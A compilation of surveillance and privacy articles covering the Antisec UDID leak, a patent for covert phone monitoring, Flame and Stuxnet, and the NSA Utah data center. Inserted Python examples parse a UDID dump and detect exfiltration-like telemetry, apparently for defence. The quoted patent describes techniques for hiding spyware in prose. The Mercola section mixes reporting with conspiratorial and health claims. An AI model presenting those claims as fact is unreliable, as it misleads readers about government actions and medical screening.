If the UDIDs are determined to be real, just what that means about law enforcement and Apple users’ privacy isn’t entirely clear. Much more than passwords or even email addresses, UDIDs are already spread around the Internet by app developers and advertisers–a study by one privacy researcher in 2011 found that 74% of the apps he tested sent a user’s UDID to a remote server. But the same researcher also found that five out of seven social gaming networks he tested allowed users to log in with only their UDID, making a stolen UDID equivalent to a stolen password.
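As an added example (not code from the Forbes article or from the Antisec release), here is a small parser for a dump laid out the way the article describes each record, together with the membership check the release invited users to make. The comma-separated layout, the device-type labels and the sample records are constructed, and the 64-hex-character token length is an assumption (a 32-byte APNS token in hex), not something the article states; the password-equivalence point above is why a user would want to know whether their UDID is in such a list.

```python
"""Parse a UDID-dump style file and check whether a given device appears in it.

Added example; not code from the Forbes article or from the Antisec release.
The article describes each record as a 40-character hex UDID, a longer push
notification token, a username and a device type. The comma-separated layout
and the records below are constructed; the 64-hex-character token length is an
assumption (a 32-byte APNS token in hex), not something the article states.
"""
import re
from collections import Counter

UDID_RE = re.compile(r"^[0-9a-f]{40}$")   # 40 chars of 0-9 and a-f, per the article
TOKEN_RE = re.compile(r"^[0-9a-f]{64}$")  # assumed token format
DEVICE_TYPES = {"iPad", "iPhone", "iPod touch"}  # the three types the article names

# Constructed sample; the third line carries a malformed UDID on purpose.
SAMPLE_DUMP = "\n".join([
    "a1b2c3d4e5f60718293a4b5c6d7e8f9012345678," + "0123456789abcdef" * 4 + ",Joe's iPad,iPad",
    "ABCDEF0123456789ABCDEF0123456789ABCDEF01," + "89abcdef01234567" * 4 + ",Kim iPhone,iPhone",
    "deadbeef," + "0123456789abcdef" * 4 + ",Broken record,iPhone",
    "0123456789abcdef0123456789abcdef01234567," + "ff" * 32 + ",Mobile Lab,iPod touch",
    "",
])


def normalize(udid):
    """UDIDs circulate in either case; compare them stripped and lower-cased."""
    return udid.strip().lower()


def parse_record(line):
    """Return a dict for a well-formed record, or None when any field fails validation."""
    parts = line.split(",")
    if len(parts) != 4:
        return None
    udid, token, name, device_type = (p.strip() for p in parts)
    udid, token = normalize(udid), token.lower()
    if not (UDID_RE.match(udid) and TOKEN_RE.match(token)
            and device_type in DEVICE_TYPES):
        return None
    return {"udid": udid, "token": token, "name": name, "device_type": device_type}


def load_dump(text):
    """Split the dump into validated records and the raw lines that were rejected."""
    records, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec is None:
            rejected.append(line)
        else:
            records.append(rec)
    return records, rejected


def device_listed(records, udid):
    """The check the release invited users to make: is my device's UDID in the dump?"""
    wanted = normalize(udid)
    return any(r["udid"] == wanted for r in records)


def summarize(records):
    """Count validated records by device type."""
    return dict(Counter(r["device_type"] for r in records))


if __name__ == "__main__":
    recs, bad = load_dump(SAMPLE_DUMP)
    print("valid records:", len(recs), "rejected lines:", len(bad))
    print("by device type:", summarize(recs))
    print("listed?", device_listed(recs, "A1B2C3D4E5F60718293A4B5C6D7E8F9012345678"))
```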

“We never liked the concept of UDIDs since the beginning indeed,” reads the Anonymous statement. “Really bad decision from Apple. Fishy thingie.”

Due perhaps to the privacy concerns around UDIDs’ proliferation, Apple stopped allowing new iOS apps to track UDIDs earlier this year.

Regardless, if the FBI has in fact collected 12 million Apple UDIDs–or even just one million–it will have some explaining to do to privacy advocates. In its release, Anonymous argues that the massive dump of users’ personal information, which it says has been stripped of many of the most identifying details, is designed to raise awareness of the FBI’s alleged gadget-tracking shenanigans. “…We will probably see their damage control teams going hard lobbying media with bullshits to discredit this,” the statement reads at one point. “But well, whatever, at least we tried and eventually, looking at the massive number of devices concerned, someone should care about it.”

For now, Anonymous refuses to answer more questions about its release–at least from the press. Before granting any interviews, it’s demanding that Gawker writer Adrian Chen, who has been especially critical of Anonymous, appear on Gawker’s home page in a “huge picture of him dressing a ballet tutu and shoe on the head.”

SOURCE: Forbes.com

PRIVACY SOS: Remote Monitoring & Access, Spy Tech Secretly Embeds Itself In Phones

In 2008, a Reston, VA-based corporation called Oceans’ Edge, Inc. applied for a patent. In March 2012 the company’s application for an advanced mobile snooping technology suite was approved.

The patent describes a Trojan-like program that can be secretly installed on mobile phones, allowing the attacker to monitor and record all communications incoming and outgoing, as well as manipulate the phone itself. Oceans’ Edge says that the tool is particularly useful because it allows law enforcement and corporations to work around mobile phone providers when they want to surveil someone’s phone and data activity. Instead of asking AT&T for a tap, in other words, the tool embeds itself inside your phone, turning your device against you.

A former employee of Oceans’ Edge notes on his LinkedIn page that the company’s clients included the FBI, Drug Enforcement Agency, and other law enforcement.

Oddly enough, Oceans’ Edge, Inc. describes itself as an information security company on its sparsely populated website. The “About Us” page reads:

Oceans Edge Inc. (OE) is an engineering company founded in 2006 by wireless experts to design, build, deploy, and integrate Wireless Cyber Solutions.
Our team is composed of subject matter experts in the following areas:
  • Wireless Cyber Security
  • Mobile Application Development
  • Wireless Communication Protocols
  • Wireless Network Implementation
  • Lawful Intercept Technology
With this expertise, we deliver engineering services and wireless technology solutions in critical mission areas for our government and commercial customers.
But while the company may offer “cyber security” solutions to government and corporations, as the website claims, the firm only has one approved patent on file with the US Patent and Trademark Office.
Remote mobile spying

The patent is for a “Mobile device monitoring and control system.” The applicants summarize the technology thusly:

Methods and apparatus, including computer program products, for surreptitiously installing, monitoring, and operating software on a remote computer controlled wireless communication device are described.

In other words, the technology works to snoop on mobile phones by secretly installing itself on phone hardware. The targeted phone is thus compromised in two ways: first, the attacker can spy on all the contents of the phone; and second, the attacker can operate the phone from afar. That’s to say, it doesn’t just let the attacker read your text messages. It also potentially lets him write them.

The summary goes on:

One aspect includes a control system for communicating programming instructions and exchanging data with the remote computer controlled wireless communication device. The control system is configured to provide at least one element selected from the group consisting of: a computer implemented device controller; a module repository in electronic communication with the device controller; a control service in electronic communication with the device controller; an exfiltration data service in electronic communication with the device controller configured to receive, store, and manage data obtained surreptitiously from the remote computer controlled wireless communication device; a listen-only recording service in electronic communication with the device controller; and a WAP gateway in electronic communication with the remote computer controlled wireless communication device.

The technology therefore also enables automated data storage of all of a phone’s activity in the attacker’s database. So if someone used this technology to spy on your phone, they would be able to use the Oceans’ Edge product to automatically store everything you do on it, to go back to later.

In case you aren’t sure who would want this kind of spook technology or why, Oceans’ Edge explains in the patent application:

A user’s employment of a mobile device, and the data stored within a mobile device, is often of interest to individuals and entities that desire to monitor and/or record the activities of a user or a mobile device. Some examples of such individuals and entities include law enforcement, corporate compliance officers, and security-related organizations. As more and more users use wireless and mobile devices, the need to monitor the usage of these devices grows as well. Monitoring a mobile device includes the collection of performance metrics, recording of keystrokes, data, files, and communications (e.g. voice, SMS (Short Message Service), network), collectively called herein “monitoring results”, in which the mobile device participates.

The application goes on to explain that the tool is beneficial to law enforcement or other customers because it allows them to avoid dealing with pesky mobile phone providers when they want to covertly spy on people’s mobile communications. Instead of the FBI going to AT&T or T-Mobile to get access to your cell data, they can just surreptitiously install this bug on your phone. They’ll get all your data — and your phone company might never know.
Mobile device monitoring can be performed using “over the air” (OTA) at the service provider, either stand-alone or by using a software agent in conjunction with network hardware such as a telephone switch. Alternatively, mobile devices can be monitored by using a stand-alone agent on the device that communicates with external servers and applications. In some cases, mobile device monitoring can be performed with the full knowledge and cooperation of one of a plurality of mobile device users, the mobile device owner, and the wireless service provider. In other cases, the mobile device user or service provider may not be aware of the monitoring. In these cases, a monitoring application or software agent that monitors a mobile device can be manually installed on a mobile device to collect information about the operation of the mobile device and make said information available for later use. In some cases, this information is stored on the mobile device until it is manually accessed and retrieved. In other cases, the monitoring application delivers the information to a server or network device. In these cases, the installation, information collection, and retrieval of collected information are not performed covertly (i.e. without the knowledge of the party or parties with respect to whom the monitoring, data collection, or control, or any combination thereof, is desired, such as, but not limited to, the device user, the device owner, or the service provider). The use of “signing certificates” to authenticate software prior to installation can make covert installation of monitoring applications problematic. When software is not signed by a trusted authority, the software may not be installed, or the device user may be prompted for permission to install the software. In either case, the monitoring application is not installed covertly as required.
Additionally, inspection of the mobile device can detect such a monitoring application and the monitoring application may be disabled by the device user. Alternatively, OTA message traffic may be captured using network hardware such as the telephone switch provided by a service provider. This requires explicit cooperation by the service provider, and provides covert monitoring that is limited to message information passed over the air. As a result, service provider-based monitoring schemes require expensive monitoring equipment, cooperation from the service provider, and are limited as to the types of information they can monitor.
The applicants describe some of the challenges they had to overcome, which include:
Additional challenges are present when the monitoring results are transmitted from a mobile device. First, many mobile devices are not configured to transmit and receive large amounts of information. In some instances, this is because the mobile device user has not subscribed to an appropriate data service from an information provider. In other instances, the mobile device has limited capabilities.
In other words, make sure you get that unlimited data plan, or else it’ll be really hard for the FBI to spy on your mobile phone! It’ll take up so much of your data usage that you’ll notice and maybe even complain to your mobile provider! That would be awkward.
Second, transmitting information often provides indications of mobile device activity (e.g. in the form of activity lights, battery usage, performance degradation).
Bad battery performance that the geeks at the Apple genius bar can’t explain? Maybe your device has been compromised.
Third, transmitting information wirelessly requires operation in areas of intermittent signal, with automated restart and retransmission of monitoring results if and when a signal becomes available.
The monitoring program has got to be clever enough to stop and restart every time you go out of range of your cell network, or you turn the phone off.
Fourth, many mobile devices are “pay as you go” or have detailed billing enabled at the service provider. The transmission of monitoring results can quickly use all the credit available on a pre-paid wireless plan, or result in detailed service records describing the transmission on a wireless customer’s billing statement.
When the snoops steal your information, you might have to pay for the pleasure of being spied on. That’s because your mobile phone provider might read the spying activity as your activity. After all, it’s coming from your phone.
Lastly, stored monitoring results can take up significant storage on a mobile device and the stored materials and the use of this storage can be observed by the device user.
Is there a large chunk of space on your phone that seems full, but you can’t figure out why? Perhaps a snoop tool like that devised by Oceans’ Edge, Inc. is storing data on your phone that it plans to later capture.
Given all of those potential problems, the technologists had a lot of work cut out for them. Here’s how they addressed those problems:
From the foregoing, it will be appreciated that effective covert monitoring of a mobile device requires the combination of several technologies and techniques that hide, disguise, or otherwise mask at least one aspect of the monitoring processes: the covert identification of the mobile devices to be monitored, the covert installation and control of the monitoring applications, and the covert exfiltration of collected monitoring results. As used herein, “covert exfiltration” refers to a process of moving collected monitoring results from a mobile device while it is under the control of another without their knowledge or awareness. Thus covert exfiltration processes can be those using stealth, surprise, covert, or clandestine means to relay monitoring data. “Collected monitoring results” as used herein includes any or all materials returned from a monitored mobile device to other devices, using either mobile or fixed points-of-presence. Examples of collected monitoring results include one or more of the following: command results, call information and call details, including captured voice, images, message traffic (e.g. text messaging, SMS, email), and related items such as files, documents and materials stored on the monitored mobile device. These materials may include pictures, video clips, PIM information (e.g. calendar, task list, address and telephone book), other application information such as browsing history, and device status information (e.g. device presence, cell towers/wireless transmitters/points-of-presence used, SIM data, device settings, location, profiles, and other device information). Additionally, the capability to covertly utilize a mobile device as a covertly managed camera or microphone provides other unique challenges. 
Thus covert monitoring of a mobile device’s operation poses the significant technical challenges of hiding or masking the installation and operation of the monitoring application, its command and control sessions, hiding the collected monitoring results until they are exfiltrated, surreptitiously transmitting the results, and managing the billing for the related wireless services. The exemplary illustrative technology herein addresses these and other important needs.
In short, Oceans’ Edge Inc., a company founded and operating in the heart of CIA country, says it has a technology that can secretly install itself on mobile phones and push all the contents of the devices to an external database, doing so entirely under the radar of both the target and the target’s mobile provider. It even boasts that the tool allows for covertly managing phone cameras and microphones.
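The patent's own list of what a covert agent must hide (data transmission, idle battery drain, retransmission bursts after signal loss, billing records, and results stored on the device until they can be sent) doubles as a list of things a device owner can watch for. The following is an added example, not code from the Privacy SOS post or from Oceans' Edge: a per-day anomaly check over constructed device telemetry that flags each of those signals against a quiet baseline, plus a correlated rule for the store-then-exfiltrate pattern the patent describes. The metric names, records and thresholds are all constructed.

```python
"""Flag telemetry patterns consistent with the covert monitoring the patent describes.

Added example, not code from the Privacy SOS post or from Oceans' Edge. The
patent lists what a covert agent must hide: data transmission, battery drain
and performance effects, retransmission after signal loss, billing records, and
stored results waiting for exfiltration. This detector turns those into per-day
checks. All records, metric names and thresholds are constructed.
"""
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class DaySample:
    day: str
    upload_mb: float        # data sent while the screen was off (constructed metric)
    idle_drain_pct: float   # battery consumed while the device was idle
    storage_mb: float       # storage in use that no user-installed app accounts for
    data_sessions: int      # data sessions on the carrier's detailed bill


METRICS = ("upload_mb", "idle_drain_pct", "storage_mb", "data_sessions")


def thresholds(baseline, k=3.0):
    """Per-metric alert level: mean + k population standard deviations of quiet days."""
    out = {}
    for m in METRICS:
        values = [getattr(s, m) for s in baseline]
        out[m] = mean(values) + k * pstdev(values)
    return out


def find_anomalies(baseline, observed, k=3.0):
    """Return (day, metric, value, limit) for every observed value above its limit."""
    limits = thresholds(baseline, k)
    findings = []
    for s in observed:
        for m in METRICS:
            v = getattr(s, m)
            if v > limits[m]:
                findings.append((s.day, m, v, round(limits[m], 2)))
    return findings


def exfiltration_days(observed, upload_limit, min_drop_mb=20.0):
    """Days on which unexplained storage fell sharply while uploads spiked.

    The patent says collected results are held on the device until they can be
    transmitted; storage that shrinks at the same moment an upload burst appears
    matches that pattern more closely than either signal on its own.
    """
    flagged = []
    for prev, cur in zip(observed, observed[1:]):
        drop = prev.storage_mb - cur.storage_mb
        if drop >= min_drop_mb and cur.upload_mb > upload_limit:
            flagged.append(cur.day)
    return flagged


# Constructed baseline: eight quiet days, chosen so every metric alternates
# between mean-1 and mean+1 and therefore gets an alert level of mean + 3.
BASELINE = [
    DaySample(f"day-{i}", 4 if i % 2 else 6, 3 if i % 2 else 5,
              100 if i % 2 else 102, 2 if i % 2 else 4)
    for i in range(1, 9)
]

# Constructed observation window: a quiet day, then a day of recording to local
# storage (battery and storage climb, nothing sent), then the exfiltration day
# (upload burst, extra billed sessions, local store emptied).
OBSERVED = [
    DaySample("day-9", 5, 4, 101, 3),
    DaySample("day-10", 5, 9, 140, 3),
    DaySample("day-11", 60, 8, 102, 11),
]


def run():
    """Evaluate the constructed window; returns (per-metric findings, exfiltration days)."""
    findings = find_anomalies(BASELINE, OBSERVED)
    exfil = exfiltration_days(OBSERVED, thresholds(BASELINE)["upload_mb"])
    return findings, exfil


if __name__ == "__main__":
    found, exfil = run()
    for f in found:
        print("anomaly: day=%s metric=%s value=%s limit=%s" % f)
    print("store-then-exfiltrate pattern on:", exfil)
```

Real telemetry is noisier than this constructed window, so the baseline window and `k` need tuning per device before a single threshold crossing is treated as more than a prompt to look closer.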
What kind of contracts does this company have, and with which government agencies? A cursory internet search didn’t turn up much, except for a couple of bids to work on a military information operations program and a cyber defense project. Neither one of those programs has an obvious link to the mobile snooping device described in the patent application.

Since we don’t know which agencies are using this technology or how, it’s hard to say to what extent this kind of secret monitoring is taking place in the US. We have some evidence suggesting that the FBI and DEA are using this tool (thanks, Chris Soghoian, for the tip). If those agencies really are using this technology, they should get warrants before they compromise anyone’s phone.

Is the government getting warrants to use this tool? We don’t know.

Oceans’ Edge Inc., like many purveyors of surveillance products, claims that its technology is only deployed for “lawful interception,” but it makes no claims about what that actually means. There’s no mention of judicial oversight, warrants, or any kind of due process. As I’ve written elsewhere on this blog, given the state of the law concerning surveillance in the digital age, we shouldn’t let our guard down simply because a company claims its surveillance tools are used lawfully. That’s because we do not know how these tools are being deployed, and yet we know that the state of surveillance law in the US at present grants the government wide latitude to infringe on our privacy in ways that are often improper or even unconstitutional.

In most cases (with a few notable exceptions), lawmakers haven’t worked to address this issue.

As we can see, surveillance technologies are developing rapidly. It’s past time for our laws to catch up.

Out of Control: Flame, Stuxnet, and the Cyber-Security Landscape

Big Brother is watching. No kidding. And the warning is coming from none other than Google, which says government spies may be spying on you. Some believe the Google announcement may be related to the recent discovery of the data-mining virus named “Flame.” In a June 3 New York Times article, Andrew Kramer and Nicole Perlroth write [1]:

“When Eugene Kaspersky, the founder of Europe’s largest antivirus company, discovered the Flame virus that is afflicting computers in Iran and the Middle East, he recognized it as a technologically sophisticated virus that only a government could create.

He also recognized that the virus, which he compares to the Stuxnet virus built by programmers employed by the United States and Israel, adds weight to his warnings of the grave dangers posed by governments that manufacture and release viruses on the internet.

“Cyberweapons are the most dangerous innovation of this century,” he told a gathering of technology company executives… While the United States and Israel are using the weapons to slow the nuclear bomb-making abilities of Iran, they could also be used to disrupt power grids and financial systems or even wreak havoc with military defenses.”

Mr. Kaspersky claims he was called in to investigate the new virus on behalf of the International Telecommunication Union, an agency of the United Nations. The virus was allegedly erasing files on computers belonging to the Iranian oil ministry.

What makes the Flame virus a major potential concern for common citizens of the world is the fact that it’s the first virus found with the ability to spread wirelessly by attaching itself to Bluetooth-enabled devices.

Once there, it can not only trace and steal information stored on those devices; according to Kramer and Perlroth the program also contains a “microbe” command that can activate any microphone within the device, record whatever is going on at the time—presumably whether you’re actually using the device or not—and transmit audio files back to the attacker. This, clearly, has huge privacy implications were it to be deployed against civilian populations.

New Revelations about the Links Between Flame and Stuxnet

While cybersecurity experts initially claimed there were no links between the earlier Stuxnet worm and the Flame virus, a recent article on The Verge now reports that the two are undoubtedly related [2]. Joshua Kopstein writes:

“[I]n examining an earlier version of Stuxnet, the lab’s researchers now find that they were wrong: a previously overlooked module within the virus is now providing the “missing link” between the two pieces of malware. The module in question… matches very closely with a module used by an early version of Flame. “It was actually so similar, that it made our automatic system classify it as Stuxnet,” wrote Alexander Gostev… indicating that the module was likely the seed of both viruses. “We think it’s actually possible to talk about a ‘Flame’ platform, and that this particular module was created based on its source code.”

The new evidence suggests that Stuxnet and Flame are two sides of the same coin, with the former built for sabotage and the latter for surveillance. But researchers also say that the Flame platform pre-dated Stuxnet and its sister, Duqu, and was likely built in the Summer of 2008.”

InformationWeek Security recently offered the following advice [3]: “… Microsoft has been working quickly to patch the certificate bug exploited by Flame. Notably, Microsoft released an update Friday [June 8] for Windows Server Update Services (WSUS) 3.0 Service Pack 2 (SP2), which according to the release notes “strengthens the WSUS communication channels … [by] trusting only files that are issued by the Microsoft Update certification authority.”

Microsoft is also set to issue an update Tuesday–as part of its monthly Patch Tuesday–that will further update all supported versions of Windows to block Flame. Security experts are recommending that all users install the update as soon as possible, since attackers will likely attempt to use the certificate vulnerability before it becomes widely patched. “Apply the certificate patch released a week ago today if you haven’t done so already,” said SANS Institute chief research officer Johannes B. Ullrich in a blog post. “This way, no patch signed by the bad certificate should be accepted tomorrow. Patch Tuesday is one of the best dates to launch such an attack, as you do expect patches anyway.”

When installing the update, however, do so preferably only if using a trusted environment. “Avoid patches while ‘on the road.’ Apply them in your home [or] work network whenever possible,” said Ullrich. “This doesn’t eliminate the chance of a ‘man in the middle’ (MitM) attack, but it reduces the likelihood.”

For users who must update while on the road, perhaps because they travel frequently, always use a VPN connection back to the corporate network, said Ullrich, since hotel networks can be malware and attack hotbeds. “Hotel networks and public hotspots frequently use badly configured HTTP proxies that can be compromised and many users expect bad SSL certificates–because of ongoing MitM attacks,” he said.”

Spy Central: Utah

In related news, Wired Magazine recently reported that the US government is building a massive spy center, right in the heart of Mormon country, in Bluffdale, Utah [4], so massive, in fact, that once finished, the facility will be five times larger than the US Capitol.

According to Wired Magazine:

“Under construction by contractors with top-secret clearances, the blandly named Utah Data Center is being built for the National Security Agency. A project of immense secrecy, it is the final piece in a complex puzzle assembled over the past decade. Its purpose: to intercept, decipher, analyze, and store vast swaths of the world’s communications as they zap down from satellites and zip through the underground and undersea cables of international, foreign, and domestic networks. The heavily fortified $2 billion center should be up and running in September 2013.

Flowing through its servers and routers and stored in near-bottomless databases will be all forms of communication, including the complete contents of private emails, cell phone calls, and Google searches, as well as all sorts of personal data trails—parking receipts, travel itineraries, bookstore purchases, and other digital “pocket litter.” It is, in some measure, the realization of the “total information awareness” program created during the first term of the Bush administration—an effort that was killed by Congress in 2003 after it caused an outcry over its potential for invading Americans’ privacy.

But “this is more than just a data center,” says one senior intelligence official who until recently was involved with the program. The mammoth Bluffdale center will have another important and far more secret role that until now has gone unrevealed. It is also critical, he says, for breaking codes.

And code-breaking is crucial, because much of the data that the center will handle—financial information, stock transactions, business deals, foreign military and diplomatic secrets, legal documents, confidential personal communications—will be heavily encrypted. According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US.

The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”[Emphasis mine]

That about says it all. And for those of you still under the mistaken belief that the US government does not have the authority to spy on its citizens, consider the following:

“… [The NSA] has undergone the largest building boom in its history, including installing secret electronic monitoring rooms in major US telecom facilities. Controlled by the NSA, these highly secured spaces are where the agency taps into the US communications networks, a practice that came to light during the Bush years but was never acknowledged by the agency. The broad outlines of the so-called warrantless-wiretapping program have long been exposed…

In the wake of the program’s exposure, Congress passed the FISA Amendments Act of 2008, which largely made the practices legal. Telecoms that had agreed to participate in the illegal activity were granted immunity from prosecution and lawsuits. What wasn’t revealed until now, however, was the enormity of this ongoing domestic spying program.

For the first time, a former NSA official has gone on the record to describe the program, codenamed Stellar Wind, in detail…

As chief and one of the two cofounders of the agency’s Signals Intelligence Automation Research Center, [William] Binney and his team designed much of the infrastructure that’s still likely used to intercept international and foreign communications. He explains that the agency could have installed its tapping gear at the nation’s cable landing stations—the more than two dozen sites on the periphery of the US where fiber-optic cables come ashore.

If it had taken that route, the NSA would have been able to limit its eavesdropping to just international communications, which at the time was all that was allowed under US law.

Instead it chose to put the wiretapping rooms at key junction points throughout the country… thus gaining access to not just international communications but also to most of the domestic traffic flowing through the US. The network of intercept stations goes far beyond the single room in an AT&T building in San Francisco exposed by a whistle-blower in 2006. “I think there’s 10 to 20 of them,” Binney says… The eavesdropping on Americans doesn’t stop at the telecom switches. To capture satellite communications in and out of the US, the agency also monitors AT&T’s powerful earth stations…

… Binney suggested a system for monitoring people’s communications according to how closely they are connected to an initial target. The further away from the target—say you’re just an acquaintance of a friend of the target—the less the surveillance. But the agency rejected the idea, and, given the massive new storage facility in Utah, Binney suspects that it now simply collects everything…”

To learn more, I highly recommend reading the featured Wired article [5] in its entirety. It’s a fascinating read, but it will not likely make you sleep better at night. The full article is available on their website and is free to view.

Google Also in the Privacy News

Beginning the first week of June, Google will warn you every time it picks up activity on your computer account that looks suspiciously like someone trying to monitor your computer activities. Google won’t say how it figured out that state-sponsored attackers may be attempting to compromise your account or computer. But it’s promised to let you know if it thinks Big Brother is tuned in to what you’re doing.

As recently reported on the New York Times’ blog [6], the warning will pop up at the top of your Gmail inbox, Google home page, or Chrome browser, stating:

 “Warning: We believe state-sponsored attackers may be attempting to compromise your account or computer.”

According to a Google blog post by Eric Grosse, VP of Security Engineering at Google [7]:

“If you see this warning it does not necessarily mean that your account has been hijacked. It just means that we believe you may be a target, of phishing or malware for example, and that you should take immediate steps to secure your account.

Here are some things you should do immediately: create a unique password that has a good mix of capital and lowercase letters, as well punctuation marks and numbers; enable 2-step verification as additional security; and update your browser, operating system, plugins, and document editors.

Attackers often send links to fake sign-in pages to try to steal your password, so be careful about where you sign in to Google and look for https://accounts.google.com/ in your browser bar. These warnings are not being shown because Google’s internal systems have been compromised or because of a particular attack.”

The Next Big War Zone = the Internet

Unless you’ve been living under a rock this past year, you’ve surely heard about the repeated attempts to restrict your online freedom and grant government near limitless control over the internet and its content.

It began in January with the introduction of two proposed laws in US Congress: the Stop Online Piracy Act (SOPA), and the Protect IP Act (PIPA). While “sold” as laws to address online copyright infringement, most of which allegedly arises from outside the US, both laws contained measures capable of severely restricting online freedom of speech and harming web sites and online communities of all kinds, including this one. After tens of millions of people rose up in various protests, both online and by hitting the pavement, both bills were “indefinitely postponed.”

Many have warned, however, that the bills are not “dead” and are likely to return.

It didn’t take long for the next round. In April, the Cyber Intelligence Sharing and Protection Act (CISPA) was brought forth, and quickly became described by opponents as an even greater threat to internet freedom than SOPA and PIPA. I won’t go into any detailed discussion on these bills here, but simply want to bring your attention to the fact that bills such as these three, while dressed up as laws that will protect you and save you money, are poorly guised attempts to gut privacy laws and open the door for a totalitarian takeover of the internet and its content.

Campaign for Liberty [8] is continuing its fight to stop another government intrusion, warning that this coming December, the United Nations will also be meeting to compile even more recommendations for international internet regulations.

While it may seem hopeless at times, I urge you to take an active role anytime the opportunity presents itself to take a stand. I personally believe internet freedom and health freedom go hand in hand these days, as a majority of people get a majority of their health information from freely available web sites such as mine.

Right now, you can sign the Campaign for Liberty Protect Internet Freedom Mandate.

If Squelching Information Freedom Doesn’t Work, What’s Next?

The draconian advancements in surveillance do not end with the erection of a massive spy central and ever-increasing attacks on internet freedom. We also have some 63 drone launch sites within the US [9], and the US military has admitted it now has drone technology in the form of tiny mechanical insects, equipped with cameras, microphones, and DNA sampling capabilities [10].

Besides that, there’s an ever-expanding arsenal of so-called “active denial weapons”—directed energy weapons that can scatter or incapacitate those in their path by a variety of means [11]. Such weapons are already being used domestically by various law enforcement agencies for crowd control. Then there are more sinister signs of readiness for domestic combat. In April, news reports began circulating questioning the Department of Homeland Security’s rationale for purchasing 450 million rounds of hollow point bullets [12].

A report by RT News reads:

“The department has yet to discuss why they are ordering such a massive bevy of bullets for an agency that has limited need domestically for doing harm, but they say they expect to continue receiving shipments from the manufacturer for the next five years, during which they plan to blow through enough ammunition to execute more people than there are in the entire United States.

The choice — and quantity — of its hollow point order raises a lot of questions about future plans for the DHS… On their website, the contractor claims that the ammunition is specifically designed so that it can pass through a variety of obstructions and offers “optimum penetration for terminal performance.” Or, in other words, this is the kind of bullet designed to stop any object dead in its tracks and, if emptied into the hands of the DHS a few hundred million times, just might do as much.

As the DHS gains more and more ground in fighting terrorism domestically, the US at the same time has turned the tables to make its definition of terrorist way less narrow. With any American blogger or free thinking on the fringe of what the government can go after under H.R. 347, or the National Defense Authorization Act that allows for the indefinite detention of US citizens without charge, the DHS could just be blasting through what’s left of its budget to make sure that its roster of agents across the country can get in their target practice over the next few years.”

Without Online Freedom, You Cannot Exercise Health Freedom

Some of you may at this point wonder why I report on an issue such as this, so let me make this point clear. Access to health information could easily be deemed a “threat” to national welfare—especially when web sites such as this one publish information that contradicts the official government stance. Examples such as advising women against national mammography screening standards, or raising concerns about vaccine safety, or questioning conventional cancer treatments could all be considered a threat to an extremely profitable status quo.

In such a scenario, they could simply shut Mercola.com, and others like us, down; leaving you with no truth-telling, corruption-exposing, alternative voices other than the officially sponsored viewpoint. And it should be quite clear by now that the government-sanctioned stance on most issues relating to health and diet are primarily dictated by powerful lobbying groups furthering financially-driven industry agendas that have absolutely nothing to do with optimizing health and longevity.

Don’t Be Fooled—Internet Security Bills are Likely Nothing of the Sort

Interestingly enough, CISPA is promoted primarily as a cyber security bill, which brings us full circle back to where this article started. Recall, the Flame virus has surveillance capabilities that far surpass previous viruses and worms that may collect or destroy data. In fact, its capability to transfer to Bluetooth-enabled gadgets and secretly activate microphones renders it perfect for spying on anyone and everyone, anywhere, at any time… which is exactly the plan, if you believe the information detailed in the featured Wired Magazine article above.

It’s interesting to note the rationale used when trying to sell us this bill. According to an April 26 report in the International Business Times [13]:

“Co-sponsor Rep. Dutch Ruppersberger, D-Md., says CISPA provides essential tools for repelling online security threats: “Without important, immediate changes to American cyber security policy, I believe our country will continue to be at risk for a catastrophic attack on our nation’s vital networks, networks that power our homes, provide our clean water or maintain the other critical services we use every day.”

Sounds like he was talking about an eventuality just like the Flame virus, or the older Stuxnet worm, for that matter. Both, incidentally, appear to have targeted Iranian oil and nuclear facilities, and neither has been officially traced back to any country or agency, despite our already overwhelming security apparatus. And he made that statement just over a month before Flame was discovered by a Russian antivirus company which, by the way, currently employs the virus hunter who discovered Stuxnet in 2010.

I’ll leave the meaning of such coincidences for you to ponder. But suffice it to say, it does not bode well if a law like CISPA is enacted that allows companies and governments to share information collected online, especially when combined with a massive data-mining virus that can skip around from one wireless piece of technology to another, from computers to cell phones to iPads, gathering data on every single social network contact every single person has, and audio files on every single conversation any one might have at any point in time. Especially now that we will shortly have the facility to store and “process” all that data.

In closing, I will simply urge you to take efforts at curbing online freedom and extending the government’s reach seriously, and whenever such efforts are launched, take action to help preserve your right to health freedom, which is closely tied to the right to online freedom of speech.

For right now, you can take a stand by signing the Campaign for Liberty Protect Internet Freedom Mandate.

SOURCE: Mercola.com

VPN vs. SSH Tunnel: Which Is More Secure?


VPNs and SSH tunnels can both securely “tunnel” network traffic over an encrypted connection. They’re similar in some ways, but different in others – if you’re trying to decide which to use, it helps to understand how each works.

An SSH tunnel is often referred to as a “poor man’s VPN” because it can provide some of the same features as a VPN without the more complicated server setup process – however, it has some limitations.

How a VPN Works

VPN stands for “virtual private network” – as its name indicates, it’s used for connecting to private networks over public networks, such as the Internet. In a common VPN use case, a business may have a private network with file shares, networked printers, and other important things on it. Some of the business’s employees may travel and frequently need to access these resources from the road. However, the business doesn’t want to expose their important resources to the public Internet. Instead, the business can set up a VPN server and employees on the road can connect to the company’s VPN. Once an employee is connected, their computer appears to be part of the business’s private network – they can access file shares and other network resources as if they were actually on the physical network.

The VPN client communicates over the public Internet and sends the computer’s network traffic through the encrypted connection to the VPN server. The encryption provides a secure connection, which means the business’s competitors can’t snoop on the connection and see sensitive business information. Depending on the VPN, all the computer’s network traffic may be sent over the VPN – or only some of it may (generally, however, all network traffic goes through the VPN). If all web browsing traffic is sent over the VPN, people between the VPN client and server can’t snoop on the web browsing traffic. This provides protection when using public Wi-Fi networks and allows users to access geographically-restricted services – for example, the employee could bypass Internet censorship if they’re working from a country that censors the web. To the websites the employee accesses through the VPN, the web browsing traffic would appear to be coming from the VPN server.

Crucially, a VPN works more at the operating system level than the application level. In other words, when you’ve set up a VPN connection, your operating system can route all network traffic through it from all applications (although this can vary from VPN to VPN, depending on how the VPN is configured). You don’t have to configure each individual application.

To get started with your own VPN, see our guides to using OpenVPN on a Tomato router, installing OpenVPN on a DD-WRT router, or setting up a VPN on Debian Linux.

How an SSH Tunnel Works

